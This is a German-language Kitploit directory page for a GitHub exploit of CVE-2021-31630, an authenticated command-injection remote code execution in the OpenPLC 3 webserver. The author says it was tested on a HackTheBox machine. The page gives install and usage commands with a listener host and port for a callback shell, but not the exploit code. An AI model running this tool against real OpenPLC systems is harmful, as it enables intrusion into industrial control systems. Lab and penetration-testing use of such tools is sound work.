Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-31630 — OpenPLC 3 WebServer Authentifizierte Remote-Code-Ausführung. | Kitploit
Tools/GitHubGitHub/manuelsantosiglesias/cve-2021-31630
SchwachstellenanalyseExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubmanuelsantosiglesias/cve-2021-31630

CVE-2021-31630

OpenPLC 3 WebServer Authentifizierte Remote-Code-Ausführung.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-31630

OpenPLC 3 WebServer Authentifizierte Remote-Code-Ausführung.

Description

Das Vorhandensein von Command Injection im Open PLC Webserver v3 ermöglicht es entfernten Angreifern, beliebigen Code auszuführen. Nur getestet auf der HTB-Maschine Wifinetictwo.htb.

Ich hatte Probleme mit allen Skripten, die die Schwachstelle ausnutzen, vielleicht weil ich Parrot verwende oder wegen meines Browsers. Chromium funktioniert für den Login, mit Firefox hatte ich Login-Probleme, und mit dem Webserver passiert etwas Seltsames bei der POST-Anfrage zum Einloggen. Ich habe das Skript von thewhiteh4t modifiziert. Es gibt Teile (hauptsächlich die Upload-Methode), die einfach kopiert wurden, aber ich habe den Teil geändert, der die Cookies vom Server holt, um den Exploit zu starten.

Der ursprüngliche PoC wird von Fellipe Oliveira bereitgestellt.

Ich hoffe, es hilft dir, wenn du Probleme damit hast.

Dependencies

root@kitploit:~
pip3 install requests

Usage

root@kitploit:~
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

Alternativ kannst du exploit.py modifizieren:

root@kitploit:~
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...

python3 exploit.py http://10.129.x.x:8080 user pass
Tool herunterladen